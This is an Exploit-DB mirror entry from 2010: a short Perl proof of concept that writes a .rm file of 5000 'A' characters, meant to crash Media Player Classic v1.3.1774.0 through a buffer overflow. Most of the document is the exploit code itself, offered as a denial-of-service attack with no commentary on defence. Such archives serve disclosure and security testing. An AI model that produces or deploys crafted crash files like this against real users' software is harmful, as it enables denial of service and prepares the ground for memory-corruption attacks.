exploit-db-mirror/exploits/windows/dos/12704.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

19 lines
No EOL
756 B
Text

# Exploit Title: [ Media Player Classic - v 1.3.1774.0 (.rm file) buffer Overflow poc ]
# Date: [ 2010-05-22 ]
# Author: [ sniper ip ]
# Software Link: []
# Version: [ v 1.3.1774.0 ]
# Tested on: [ Windows xp2 , Windows xp3 , Windows 7 ]
# CVE : [if exists]
# Code : [
#!/usr/bin/perl
# |--------------------------------------------------------------------------------------------------| #
# | -- Media Player Classic - v 1.3.1774.0 (.rm file) buffer Overflow poc --| #
# | ---------- -- By : sniper ip # My Email : sniper-ip@hotmail.com ------------- | #
# |--------------------------------------------------------------------------------------------------| #
$buff="A" x 5000;
open (myfile , ">>sniper.rm");
print myfile $buff;
close (myfile);